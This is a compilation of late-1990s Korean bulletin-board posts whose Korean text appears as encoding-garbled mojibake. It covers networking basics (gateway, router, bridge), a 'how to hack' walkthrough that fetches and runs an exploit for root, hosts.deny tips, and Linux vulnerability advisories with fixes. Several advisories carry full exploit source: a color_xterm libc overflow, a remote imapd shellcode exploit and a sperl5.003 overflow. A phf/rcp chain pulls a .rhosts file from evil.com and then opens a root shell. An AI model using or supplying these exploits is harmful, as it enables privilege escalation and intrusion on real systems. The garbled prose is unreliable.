Á¦ ¸ñ: [°­ÁÂ] °ÔÀÌÆ®¿þÀÌ , ¶ó¿ìÅÍ , ºê¸´Áö¶õ? °ÔÀÌÆ®¿þÀÌ(Gateway)´Â ÀϹÝÀûÀ¸·Î ÇϳªÀÇ ³×Æ®¿öÅ©, ȤÀº ¿ïŸ¸® ¾È¿¡¼­ ¹ÛÀ¸·Î ºüÁ®³ª°¡´Â Áß°£ °ü¹®¿ªÇÒÀ» ¼öÇàÇÏ´Â °ÍÀ» Gateway¶ó°í ÇÕ´Ï´Ù. ÀϹÝÀûÀ¸·Î À̾߱âÇÒ¶§, ¶ó¿ìÅÍ(Router)¿Í °ÔÀÌÆ®¿þÀÌ´Â °°Àº Àǹ̷Π»ý°¢ÇÏ½Ã¸é ¹®Á¦°¡ ¾øÀ» °ÍÀÔ´Ï´Ù. ÇÏÁö¸¸, °ÔÀÌÆ®¿þÀÌ°¡ ´Ù¸¥ Àǹ̷Π»ç¿ëµÉ ¼öµµ ÀÖ½À´Ï´Ù. ¿¹¸¦ µé¸é, WWW¿¡¼­ CGI(Common Gateway Interface)°°Àº °ÍÀº °ÔÀÌÆ®¿þÀÌÀÇ Àǹ̰¡ ¶ó¿ìÅͶû ´Ù¸£Áö¿ä. http daemonÀÌ ÀÎÀÚ¸¦ ¹Þ¾Æ ¾î¶² ÇÁ·Î±×·¥À» ½ÇÇà½ÃÄÑ ±× °á°ú°ªÀ» »ç¿ëÇÏ¿© client¿¡ ´Ù½Ã htmlÇüÅ·ΠÀڷḦ ÀüÇØÁÖ´ ÇÏ¿©°£, 'ÀϹÝÀû'ÀÎ °æ¿ì¿¡, Router¿Í Gateway´Â °°Àº Àǹ̷Π»ç¿ëµË´Ï´Ù. ºê¸´Áö(Bridge)´Â ¹«¾ùÀ̳ĸé¿ä. Router¿Í ºñ½ÁÇÏ°Ô, packetÀ» filtering, forwardingÇØ ÁÖ´Â ¿ªÇÒÀ» ¼öÇàÇÏ´Â Network ÀåºñÀÔ´Ï´Ù. Router¿Í ¹«¾ùÀÌ ´Ù¸£³Ä°í¿ä? Bridge´Â Ethernet Address(LANÄ«µå ROM¿¡ ¹ÚÇôÀÖ´Â °íÀ¯³Ñ¹ö)·Î packetÀ» filteringÇÕ´Ï´Ù. Router´Â IP address·Î packetÀ» filtering, forwardingÇÕ´Ï´Ù. ÀÌ°Ô ¹«½¼ Àǹ̳Ä? A¶ó´Â LAN°ú B¶ó´Â LANÀÌ ºê¸´Áö·Î ¿¬°áµÇ¾î ÀÖ´Ù°í °¡Á¤ÇÕ´Ï´Ù. Ethernet¿¡¼­ A¶ó´Â LAN¾È¿¡ ÀÖ´Â ÇÑ È£½ºÆ®°¡ °°Àº LAN¾ÈÀÇ È£½ºÆ®¿¡°Ô packetÀ» º¸³À´Ï´Ù. ±×·¯¸é, ÀÌ ÆÐŶÀº B¶ó´Â LANÀ¸·Î Àü´ÞµÉ±î¿ä? ±×·¸Áö ¾Ê½À´Ï´Ù. EthernetÀº ¹æ¼Û(broadcasting)¹æ½ÄÀ¸·Î packetÀ» º¸³»¹Ç·Î A·£¾ÈÀÇ ºê¸´Áö¸¦ Æ÷ÇÔÇÑ ¸ðµç È£½ºÆ®°¡ °°Àº ÆÐŶÀ» ¹Þ¾Æº¸Áö¸¸, ºê¸´Áö´Â A·£ ¾ÈÀÇ È£½ºÆ®°¡ A·£ ¾ÈÀÇ È£½ºÆ®·Î packetÀ» º¸³»´Â °ÍÀ̹ǷΠB·£ÂÊÀ¸·Î´Â packetÀ» broadcastingÇÏÁö ¾Ê½À´Ï´Ù. ¸¸ÀÏ, A·£¾ÈÀÇ È£½ºÆ®¿¡¼­ packetÀ» B·£¾ÈÀÇ È£½ºÆ®·Î º¸³½´Ù¸é, ¸ÕÀú È£½ºÆ®´Â A·£¾ÈÀ¸·Î packetÀ» broadcastingÇÕ´Ï´Ù. A·£¾È¿¡´Â packetÀÇ ¸ñÀûÁö°¡ ¾øÁö¿ä. ÇÏÁö¸¸, ÀÌ ÆÐŶÀ» ¹Þ¾Æº» ºê¸´Áö´Â ÀÌ°É BÂÊÀ¸·Î broadcastingÇÏ´Â °Ì´Ï´Ù. ±×·³, ÆÐŶÀÌ Àü´ÞµÇ°ÚÁÒ. ±×·¯±â À§Çؼ­´Â Bridge´Â µÎ°³ ÀÌ»óÀÇ Network Interface¸¦ °¡Á®¾ß ÇÏ°í¿ä (¾çÂÊ ·£À¸·Î Çϳª¾¿ÀÇ Interface°¡ ÀÖ¾î¾ß ÇÏ°ÚÁö¿ä) ¾çÂÊ LAN¾ÈÀÇ Ethernet Address¿¡ ´ëÇÑ Á¤º¸¸¦ ¸ðµÎ °¡Áö°í ÀÖ¾î¾ß ÇÕ´Ï´Ù. LANÀ¸·Î ¿¬°áÇϸé ÀÚµ¿À¸·Î bridge¿¡¼­ À̸¦ °¨ÁöÇؼ­ Á¤º¸ tableÀ» ¸¸µéÁö¿ä. ºê¸´Áö(Bridge)¸¦ »ç¿ëÇÏ´Â ¸ñÀûÀº segment¸¦ ºÐ¸®Çϱâ À§ÇØ »ç¿ëµË´Ï´Ù. 
Ethernet¹æ½ÄÀÇ ¾àÁ¡Àº broadcasting¹æ½Ä ¶§¹®¿¡ ÇϳªÀÇ LAN¾È¿¡ ³Ê¹« ¸¹Àº È£½ºÆ®°¡ ¹°·ÁÀÖ´Ù¸é, ¼º´ÉÀÌ ÀúÇϵDZ⠶§¹®ÀÔ´Ï´Ù. ±×·¯¹Ç·Î, ÇϳªÀÇ ·£À» µÎ°³ ÀÌ»óÀ¸·Î ÂÉ°¶¶§, Áï, Bridge¸¦ µÎ¾î °°Àº ·£¾ÈÀÇ packetÀº ¹Ù±ùÀ¸·Î ³ª°¡Áö ¸øÇÏ°Ô Çϸé ÀÌ·± ´ÜÁ¡À» ±Øº¹ÇÒ ¼ö ÀÖ½À´Ï´Ù. Router´Â Bridge¿Í µ¿ÀÛ¿ø¸®°¡ °°½À´Ï´Ù. ´Ü, packetÀ» ¹«¾ùÀ¸·Î filtering/forwardingÇÏ´À³Ä°¡ ´Ù¸¨´Ï´Ù. ÀϹÝÀûÀÎ router´Â bridge ±â´ÉÀ» °âÇÏ°í ÀÖ½À´Ï´Ù. ±×·¡¼­, ºê¶ó¿ìÅÍ(brouter)¶ó°í ºÎ¸£±âµµ ÇÏÁö¿ä. ±×¸²À» ±×·Á¼­ Á»´õ ÀÚ¼¼È÷ ¼³¸íÇϸé ÁÁÀ¸·Ã¸¸.... È÷È÷, ´õÀÌ»ó ¸»ÇÏ¸é ¾ø´Â ½Ç·ÂÀÌ µéÅ볪°ÚÁö¿ä? :-P ¸¶Áö¸·À¸·Î ÇѸ¶µð ´õ, EthernetÀº ISO 802À§¿øȸ¿¡¼­ Á¦Á¤ÇÑ 802.2¹æ½Ä (CSMA/CD, Carrier Sense Multiple Access with Collision Detection) À» »ç¿ëÇÕ´Ï´Ù. ±Ã±ÝÇÏ½Ã¸é ¾Æ¹«°Å³ª Åë½ÅÃ¥À» º¸½Ã¸é Ä£ÀýÇÏ°í ÀÚ¼¼ÇÑ ¼³¸íÀÌ ³ª¿ÍÀÖÀ» °Ì´Ï´Ù. Á¦ ¸ñ: [°­ÁÂ] ÇØÅ·ÇÏ´Â ¹æ¹ý ÀÌ °­Á´ ¾ÆÁÖ À§ÇèÇÑ °­Á°¡ µÉ ¼öµµ ÀÖ½À´Ï´Ù. ÀÌ °­Á¸¦ Àß ÀÌ¿ëÇÏ¸é ³ª¿ì´©¸®°èÁ¤ ¼­ºñ½º¸¦ ÇØÅ· ÇÒ ¼öµµ ÀÖ´Â ½Ç·ÂÀÚ(?)°¡ µÇÁÒ.. ¼ÓÀÌ ºó °Ñ¸¸ È­·ÁÇÑ ½Ç·ÂÀÚ¿ä. Àý´ë·Î ÀÌ°ÍÀ» ±×´ë·Î Èä³»¸¸ ³»º¸°í ±×°Í¿¡¼­ ¸ØÃß¼¼¿ä. ´õ °øºÎ¸¦ ÇÑÈÄ¿¡ º»°ÝÀûÀ¸·Î ÇϽðí.. ±×·³ °­Á ¿Ã¶ó °©´Ï´Ù. Âü°í·Î °ú°Å¿¡ ÇØÅ·»ç°ÇÀ¸·Î ¶°µé¼®ÇÑ ÇØÅ·Àº ¸ðµÎ ÀÌ·± Á¾·ùÀÇ ÇØÅ·ÀÔ´Ï´Ù. Ãʺ¸ÀûÀÎ ¼öÁØÀÌÁö¿ä. ±×·³.. ÇØÅ·ÇÏ´Â »ç¶÷µéÀÇ ´ëºÎºÐÀº ÀÌ·± ½ÄÀ¸·Î ÇÑ´ä´Ï´Ù. ¾ÆÁÖ º¸ÆíÀûÀÎ °ÍÀÌÁÒ.. ¹Ù·Î ¼Ò½º Äڵ带 ÇØ´ç È£½ºÆ®(ÇØÅ·´ë»ó)¿¡¼­ ÄÄÆÄÀÏ ÇÑÈÄ ½ÇÇà½ÃÅ°¸é ³¡³ª´Â °ÅÁÒ.. ¾ÆÁÖ ½±´Ù±¸¿ä? ±×·³ ±× °úÁ¤À» Çѹø Çغ¼±î¿ä? [ ½ÃÀÛ ] [root@loveyou lib]# telnet bbs.xxx.xx.xx Trying 20.23.10.3... Connected to xxxxxx.xx.kr. Escape character is '^]'. Welecom My host~ ## 01:17 on Monday, 30 March 1998 (ttyp5) login: loveyou Password: Last login: Mon Mar 30 00:50:04 from loveyou [loveyou@bbs loveyou]$ ls -al /usr/bin/sperl* -rwsr-xr-x 2 root root 402280 Apr 22 1997 /usr/bin/sperl5.003 /* ÇØÅ·ÇÒ ´ë»óÀ» ã½À´Ï´Ù. ´ëºÎºÐÀÌ setuid °¡ °É¸° ÇÁ·Î±×·¥À» ãÀ½ º¸¼¼¿ä. rws ¶ó°í setuid°¡ ¼³Á¤µÇ¾úÁÒ? ±×·±ÈÄ¿¡ ÇØ´ç ÇØÅ· ÇÁ·Î±×·¥À» °¡Á®¿Í¼­ ÄÄÆÄÀÏÀ» ÇÕ´Ï´Ù. º¸ÅëÀº ftp ·Î ±× ¼Ò½º¸¦ °¡Á® ¿É´Ï´Ù. */ [loveyou@bbs loveyou]$ ftp loveyou.ml.org Connected to loveyou.ml.org. 
220 xxxxxxxx.xx.xx.xr FTP server (Version wu-2.4.2-academ[BETA-xx](1) Sat xxx xx xx:xx:xx KST 199x) ready. Name (xxxxx:loveyou): loveyou 331 Password required for loveyou Password: 230 User shade logged in. Remote system type is UNIX. Using binary mode to transfer files. ftp> get hack.c local: hack.c remote: hack.c 200 PORT command successful. 150 Opening BINARY mode data connection for hack.c (4037 bytes). 226 Transfer complete. 4037 bytes received in 1.57 secs (2.5 Kbytes/sec) ftp> quit [loveyou@bbs loveyou]$ cc -o hack hack.c /* ¼Ò½º¸¦ ÄÄÆÄÀÏ ÇÑ´Ù. hack À̶ó´Â ÇÁ·Î±×·¥ »ý¼º */ [loveyou@bbs loveyou]$ ./hack Using address: 0x45c # <- root ÇÁ·ÒÇÁÆ® Áö¿ä? ÀÌ·¸°Ô µÇ¸é ¼º°øÀÌ¿¡¿ä ÇØÅ· Çϱ⠳ʹ« ½¬¿ö¿ä.±×·¸Áö ¾ÊÀº°¡¿ä? ÇÏÁö¸¸ ÀÌ·¸°Ô ½¬¿î ÇØÅ·Àº ¹Ì¿¬¿¡ °ü¸®ÀÚµéÀÌ ¹æÁöÇÒ ¼ö ÀÖÁö¿ä.. °ü¸®ÀÚ´Â µÎ°¡Áö ÇൿÀ» ÇÒ ¼ö ÀÖ½À´Ï´Ù. ù¹ø°, ¿ì¼± ¸·¾ÆµÐ´Ù. chmod 700 /usr/bin/sperl* µÎ¹ø°, ±× ´ÙÀ½Àº ftp ·Î °¢ ÇØ´ç ¸®´ª½º »çÀÌÆ®³ª ¼ÒÇÁÆ®¿þ¾î »çÀÌÆ®·Î °¡¼­ ÆÐÄ¡ ÆÄÀÏÀ» °¡Á®¿Í¼­ ÆÐÄ¡ÇÑ´Ù. ¾î¶»°Ô ÇÒÁö ¸ð¸¥´Ù¸é ±×³É ù¹ø°¸¸ Çسõ°í À־ µÇ°í ·¯ºêÀ¯¿¡°Ô ÀÚ¹®À» ±¸Çصµ µÈ´Ù. ^_^ ¿©±â±îÁö¿¡¿ä. Àç¹ÌÀÖÁö¿ä? ÀÌ·±°ÍÀÌ ÇØÅ·ÀÌ¿¡¿ä. °ú°Å¿¡ ³ª¿ì´©¸® °èÁ¤ ¼­¹ö ÇØÅ·Çؼ­ ³­¸®³µ´ø °íµîÇлýÀº ÀÌ·± ÇØÅ·À̾úÁÒ. ³Ê¹« °£´ÜÇÏÁÒ? ÇØÅ·À̶ó´Â °Ç ÀÌÁ¤µµ°¡Áö°í º¼ ¼ö°¡ ¾ø¾î¿ä. ¾ÆÁÖ ÀϺκп¡ ºÒ°úÇϴϱî¿ä ÇÏÁö¸¸ ÀÌ·± °ÍÀ» ¼º°øÇß´Ù°í ¿ìÂá´ë´Â »ç¶÷µéÀÌ ¸¹¾Æ¼­ Á» ±×·¸³×¿ä. Á¦ ¸ñ: [°­ÁÂ] ¿ÜºÎ ƯÁ¤ È£½ºÆ®ÀÇ Á¢±Ù ¸·±â À½..¾î¶² È£½ºÆ®¿¡¼­ ÀÚ²Ù ÀÌ»óÇÑ »ç¶÷ÀÌ µé¾î¿Â´Ù°í ´À³¥¶© ±× È£½ºÆ®ÀÇ »ç¶÷¸¸ ¸øµé¾î¿À°Ô ÇÏ°í ½Í´Ù±¸¿ä? ±×·¸´Ù¸é ¹æ¹ýÀÌ ÀÖÁÒ. ¹Ù·Î À¯´Ð½º,¸®´ª½º¶ó¸é ±âº»ÀûÀ¸·Î ¼³Ä¡µÇ¾î ÀÖ´Â TCP ¿ÍÆÛ¸¦ ÀÌ¿ëÇÏ´Â °Ì´Ï´Ù. ¾Æ~ À¢Áö °ÅâÇÏ´Ù±¸¿©? µû¾Ç 2ÁÙ¸¸ ¾²¸é µË´Ï´Ù.ÇÏÇÏ /etc/hosts.deny ¶ó´Â ÆÄÀÏÀÌÁÒ.. ±× ÆÄÀϾȿ¡ ÇÁ·ÎÅäÄÝ:È£½ºÆ®³×ÀÓ ÀÌ·± Çü½ÄÀ¸·Î ¾²¸é µË´Ï´Ù. ±× ¿¹¸¦ µé¸é ALL:soback.kornet.nm.kr À̶ó´Â ³»¿ëÀº soback.kornet.nm.kr ¿¡¼­ ¿À´Â ¸ðµç ÇÁ·ÎÅäÄÝÀÇ Á¢¼ÓÀ» ±ÝÁö ÇÑ´Ù´Â ¸»ÀÔ´Ï´Ù. Èå..À¯¿ëÇÏÁÒ? /etc/hosts.allow ¶ó´Â ÆÄÀÏÀº ƯÁ¤ È£½ºÆ®ÀÇ Á¢¼ÓÀ» Çã°¡ ÇÒ¶§ ÇÏÁÒ. ±×·¯´Ï±ñ À½ À§ÀÇ /etc/hosts.denyº¸´Ü »óÀ§ÀÇ ºñÁßÀ» Â÷Áö ÇÕ´Ï´Ù. 
Á¦ ¸ñ: [º¸¾È] ¸®´ª½º xterm,color_xterm ¸í·É xrm (color_xterm, xterm, nxterm) ½Ã½ºÅÛ Linux Slackware 3.1, RedHat 4.2 ¹®Á¦Á¡ ¹öÆÛ ¿À¹ö Ç÷ο츦 ÀÏÀ¸Å²´Ù. >-- cx.c --< /* * color_xterm buffer overflow exploit for Linux with * non-executable stack * Copyright (c) 1997 by Solar Designer * * ÄÄÆÄÀÏ ¹æ¹ý: * gcc cx.c -o cx -L/usr/X11/lib \ * `ldd /usr/X11/bin/color_xterm | sed -e s/^.lib/-l/ -e s/\\\.so.\\\+//` * * ½ÇÇà : * $ ./cx * system() found at: 401553b0 * "/bin/sh" found at: 401bfa3d * bash# exit (^^;) * Segmentation fault */ #include #include #include #include #include #include #include #include #include #define SIZE1 1200 /* Amount of data to overflow with */ #define ALIGNMENT1 0 /* 0..3 */ #define OFFSET 22000 /* Structure array offset */ #define SIZE2 16000 /* Structure array size */ #define ALIGNMENT2 5 /* 0, 4, 1..3, 5..7 */ #define SIZE3 SIZE2 #define ALIGNMENT3 (ALIGNMENT2 & 3) #define ADDR_MASK 0xFF000000 char buf1[SIZE1], buf2[SIZE2 + SIZE3], *buf3 = &buf2[SIZE2]; int *ptr; int pid, pc, shell, step; int started = 0; jmp_buf env; void handler() { started++; } /* SIGSEGV handler, to search in libc */ void fault() { if (step < 0) { /* Change the search direction */ longjmp(env, 1); } else { /* The search failed in both directions */ puts("\"/bin/sh\" not found, bad luck"); exit(1); } } void error(char *fn) { perror(fn); if (pid > 0) kill(pid, SIGKILL); exit(1); } int nz(int value) { if (!(value & 0xFF)) value |= 8; if (!(value & 0xFF00)) value |= 0x100; return value; } void main() { /* * A portable way to get the stack pointer value; why do other exploits use * an assembly instruction here?! 
*/ int sp = (int)&sp; signal(SIGUSR1, handler); /* Create a child process to trace */ if ((pid = fork()) < 0) error("fork"); if (!pid) { /* Send the parent a signal, so it starts tracing */ kill(getppid(), SIGUSR1); /* A loop since the parent may not start tracing immediately */ while (1) system(""); } /* Wait until the child tells us the next library call will be system() */ while (!started); if (ptrace(PTRACE_ATTACH, pid, 0, 0)) error("PTRACE_ATTACH"); /* Single step the child until it gets out of system() */ do { waitpid(pid, NULL, WUNTRACED); pc = ptrace(PTRACE_PEEKUSR, pid, 4*EIP, 0); if (pc == -1) error("PTRACE_PEEKUSR"); if (ptrace(PTRACE_SINGLESTEP, pid, 0, 0)) error("PTRACE_SINGLESTEP"); } while ((pc & ADDR_MASK) != ((int)main & ADDR_MASK)); /* Single step the child until it calls system() again */ do { waitpid(pid, NULL, WUNTRACED); pc = ptrace(PTRACE_PEEKUSR, pid, 4*EIP, 0); if (pc == -1) error("PTRACE_PEEKUSR"); if (ptrace(PTRACE_SINGLESTEP, pid, 0, 0)) error("PTRACE_SINGLESTEP"); } while ((pc & ADDR_MASK) == ((int)main & ADDR_MASK)); /* Kill the child, we don't need it any more */ if (ptrace(PTRACE_KILL, pid, 0, 0)) error("PTRACE_KILL"); pid = 0; printf("system() found at: %08x\n", pc); /* Let's hope there's an extra NOP if system() is 256 byte aligned */ if (!(pc & 0xFF)) if (*(unsigned char *)--pc != 0x90) pc = 0; /* There's no easy workaround for these (except for using another function) */ if (!(pc & 0xFF00) || !(pc & 0xFF0000) || !(pc & 0xFF000000)) { puts("Zero bytes in address, bad luck"); exit(1); } /* * Search for a "/bin/sh" in libc until we find a copy with no zero bytes * in its address. To avoid specifying the actual address that libc is * mmap()ed to we search from the address of system() in both directions * until a SIGSEGV is generated. 
*/ if (setjmp(env)) step = 1; else step = -1; shell = pc; signal(SIGSEGV, fault); do while (memcmp((void *)shell, "/bin/sh", 8)) shell += step; while (!(shell & 0xFF) || !(shell & 0xFF00) || !(shell & 0xFF0000)); signal(SIGSEGV, SIG_DFL); printf("\"/bin/sh\" found at: %08x\n", shell); /* buf1 (which we overflow with) is filled with pointers to buf2 */ memset(buf1, 'x', ALIGNMENT1); ptr = (int *)(buf1 + ALIGNMENT1); while ((char *)ptr < buf1 + SIZE1 - sizeof(int)) *ptr++ = nz(sp - OFFSET); /* db */ buf1[SIZE1 - 1] = 0; /* buf2 is filled with pointers to "/bin/sh" and to buf3 */ memset(buf2, 'x', SIZE2 + SIZE3); ptr = (int *)(buf2 + ALIGNMENT2); while ((char *)ptr < buf2 + SIZE2) { *ptr++ = shell; /* db->mbstate */ *ptr++ = nz(sp - OFFSET + SIZE2); /* db->methods */ } /* buf3 is filled with pointers to system() */ ptr = (int *)(buf3 + ALIGNMENT3); while ((char *)ptr < buf3 + SIZE3 - sizeof(int)) *ptr++ = pc; /* db->methods->mbfinish */ buf3[SIZE3 - 1] = 0; /* Put buf2 and buf3 on the stack */ setenv("BUFFER", buf2, 1); /* GetDatabase() in libX11 will do (*db->methods->mbfinish)(db->mbstate) */ execl("/usr/X11/bin/color_xterm", "color_xterm", "-xrm", buf1, NULL); error("execl"); } >-- cx.c --< ÇØ°áÃ¥ ¾Æ·¡¿¡¼­ ÆÐÄ¡¹öÁ¯À» ã¾Æ¼­ ÆÐÄ¡ÇÑ´Ù. http://www.false.com/security/linux-stack/3:50 (17ÁÙ) Á¦ ¸ñ: [º¸¾È] ¸®´ª½º Ghostscript ¸í·É Ghostscript ½Ã½ºÅÛ Linux systems running Ghostscript 1.4 ¹®Á¦Á¡ °í½ºÆ® ½ºÅ©¸³ÀÇ ¹®Á¦Á¡Àº ¾î¶² ¼û°ÜÁø Äڵ带 ÀÌ¿ëÇؼ­ ±×°ÍÀ» ÀÌ¿ëÇØ Àá½Ã ½©À» ÅëÇؼ­ ¾î¶²ÀÏÀ» ÇÒ ¼ö ÀÖ´Ù. ±× ÄÚµå´Â Æ÷½ºÆ® ½ºÅ©¸³Æ®ÀÇ ¼û°ÜÁø ºñ¹Ð ÄÚµåÀÏ °ÍÀÌ´Ù. ·çÆ®ÀÇ ¸í·ÉÀ» ³»¸± ¼ö ÀÕ´Ù. ¹®Á¦Á¡ 1.4 ÀÌÈÄÀÇ °í½ºÆ® ½ºÅ©¸³Æ®¸¦ ±ò¾Æ¶ó.. --------------------------- ¹ø È£: 114/177 µî·ÏÀÚ: ±è¿ëÁØ(·¯ºêÀ¯) 98/02/16 23:52 (89ÁÙ) Á¦ ¸ñ: [º¸¾È] ¸®´ª½º imapd ¸í·É imapd ½Ã½ºÅÛ RedHat 4.0¹öÁ¯ ±îÁö Slackware 3.2 ¹®Á¦Á¡ imapdµ¥¸óÀ» ÀÌ¿ëÇؼ­ ¸®¸ðÆ® Á¢¼Ó ÀÚ°¡ ·çÆ®¸¦ ¾òÀ» ¼ö ÀÖ´Ù. ÀÌ´Â ¸Å¿ì À§ÇèÇϸç...·çÆ®Æнº¿öµå Á¶Â÷ ¹Ù²Ü ¼ö ÀÖ´Ù. 
/* * IMAPd Linux/intel remote xploit by savage@apostols.org * 1997-April-05 * Workz fine against RedHat and imapd distributed with pine * Special THANKS to: b0fh,|r00t,eepr0m,moxx,Fr4wd,Kore and the * rest of ToXyn !!! * usage: * $ (imap 0; cat) | nc victim 143 * | * +--> usually from -1000 to 1000 ( try in steps of 100 ) * [ I try 0, 100 and 200 - so1o ] */ #include char shell[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\xeb\x3b\x5e\x89\x76\x08\x31\xed\x31\xc9\x31\xc0\x88" "\x6e\x07\x89\x6e\x0c\xb0\x0b\x89\xf3\x8d\x6e\x08\x89\xe9\x8d\x6e" "\x0c\x89\xea\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\xe8\xc0\xff\xff\xff/bin/sh"; char username[1024+255]; void main(int argc, char *argv[]) { int i,a; long val; if(argc>1) a=atoi(argv[1]); else a=0; strcpy(username,shell); for(i=strlen(username);i> 8; username[i+2] = (val & 0x00ff0000) >> 16; username[i+3] = (val & 0xff000000) >> 24; } username[ sizeof(username)-1 ] = 0; printf("%d LOGIN \"%s\" pass\n", sizeof(shell), username); } ÇØ°áÃ¥ ·¡µåÇÞ 4.0 
»ç¿ëÀÚ´Â 4.1·Î ¹Ù²Ù¸é ÆÐÄ¡µÈ´Ù. ·¡µåÇÞ 2.0 »ç¿ëÀÚ´Â rpm -e imap¸¦ ½ÇÇà½ÃÄѼ­ ¾ø¾Ö¶ó ftp.redhat.com ¿¡ °¡¸é ÆÐÄ¡µÈ°ÍÀÌ ÀÖÀ¸´Ï ¹Þ¾Æ¼­ ÆÐÄ¡Ç϶ó Á¦ ¸ñ: [º¸¾È] ¸®´ª½º ircd ¸í·É ircd ½Ã½ºÅÛ Debian Linux(1.3.1) ¹®Á¦Á¡ IRC¼­¹öÀÇ ÆÐÅ°ÁöÀÎ ircd 2.9.32-3 Àº µ¥ºñ¾È 1.3.1¿¡ Æ÷ÇԵǾî ÀÖ´Ù. ù°·Î ¹®Á¦Á¡Àº /etc/ircd/ ¸¦ ÀÐÀ»¼ö ÀÖ´Ù. ÀÌ µð·ºÅ丮¿¡ Æ÷ÇÔµÈ ¼­¹ö ¼³Á¤ ÆÄÀÏ°ú irc ¼³Á¤ÀÚÀÇ Æнº¿öµå Á¶Â÷ ÀÐÀ» ¼ö ÀÖµµ·Ï Æ۹̼ÇÀÌ ¿­·ÁÀÖ´Ù. µÑ°·Î ÆÐÅ°Áö¸¦ ¼³Ä¡Çϸé /etc/inetd.conf¿¡ ÀÌ·± ÇÑÁÙÀÌ ¼³Á¤µÈ´Ù. ircd stream tcp wait root /usr/sbin/ircd ircd -i ------ À§¿¡¼­ º¸µíÀÌ root ¶ó°í µÇ¾î ÀÖ´Â ºÎºÐÀ» irc ¶ó°í °íÃĶó.. ·çÆ®´Â °³¿©ÇÏÁö ¾Ê´Â°ÍÀÌ ¿øÄ¢ÀÌ´Ù. ÇØ°áÃ¥ Loveyou~# chmod 700 /etc/ircd/ Loveyou~# chown irc.irc /etc/ircd/ Loveyou~# grep ircd /etc/inetd.conf ircd stream tcp wait irc /usr/sbin/ircd ircd -i À§Ã³·³ irc ¶ó°í °íÃÄÁ®¾ß ÇÑ´Ù. --------------------------- Á¦ ¸ñ: [º¸¾È] ¸®´ª½º rcp (¸®¸ðÆ®) ¸í·É /usr/bin/rcp ½Ã½ºÅÛ Red Hat 4.0 (if user nobody has UID 65535 and Slackware 3.1 (possibly others) ¹®Á¦Á¡ nobodyÀÇ uid°¡ 65535À϶§ /usr/bin/rcpÀÇ ¹®Á¦Á¡ÀÌ ³ªÅ¸³­´Ù. »ó´ë¹æÀÇ ¼­¹ö°¡ NCSA httpd ¼­¹ö¸¦ ¾´´Ù¸éÀº ´ÙÀ½°ú °°Àº ÀÏÀ» ¹úÀÏ ¼ö°¡ ÀÖ´Ù. root[11:20][504]~# su - nobody [nobody@slip-70-8 /]$ id uid=65535(nobody) gid=65535 [nobody@slip-70-8 /]$ rcp oberheim@moe.cc.utexas.edu:brb /tmp/test [nobody@slip-70-8 /]$ ls -la /tmp/test -rw------- 1 root 65535 0 Jan 29 11:20 /tmp/test $ echo "+ +" > /tmp/my.rhosts $ echo "GET /cgi-bin/phf?Qalias=x%0arcp+hacker@evil.com:/tmp/my.rhosts+ /root/.rhosts" | nc -v - 20 victim.com 80 $ rsh -l root victim.com "/bin/sh -i" # ÇØ°áÃ¥ nobodyÀÇ UID¸¦ 99 ·Î Çصξî¶ó. --------------------------- Á¦ ¸ñ: [º¸¾È] ¸®´ª½º perl 5.003 ¸í·É sperl5.003 Àû¿ëµÇ´Â È£½ºÆ® Linux Slackware 3.1, 3.2 ·¡µåÇÞ ¸®´ª½º ¹®Á¦Á¡ sperl5.003 À̶ó´Â ÆÄÀÏÀ» ¹öÆÛ ¿À¹öÇ÷ο츦 ½Ãų¼ö ÀÖ´Ù. 
#include #define DEFAULT_OFFSET 640 #define DEFAULT_BUFFER_SIZE 1600 #define NOP 0x90 char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } void main(int argc, char *argv[]) { char *buff, *ptr; long *addr_ptr, addr; int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; int i; if (!(buff = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } addr = get_sp() - offset; printf("Using address: 0x%x\n", addr); ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; for (i = 0; i < bsize/2; i++) buff[i] = NOP; ptr = buff + ((bsize/2) - (strlen(shellcode)/2)); for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize - 1] = '\0'; execl("/usr/bin/sperl5.003","/usr/sbin/sperl5.003",buff, NULL); } ÇØ°á sperl5.003 ÀÇ suid bit¸¦ ¾ø¾Ö¶ó. ¾Æ´Ï¸é 5.003_97f ÀÇ ¹öÁ¯À¸·Î ¹Ù²Ù¾î¶ó. --------------------------- Á¦ ¸ñ: [º¸¾È] ¸®´ª½º sysctl() ¸í·É sysctl() Àû¿ëµÇ´Â ½Ã½ºÅÛ Linux prior to 2.0.31 ¹®Á¦Á¡ sysctl()À̶ó´Â ÇÔ¼ö¿¡ 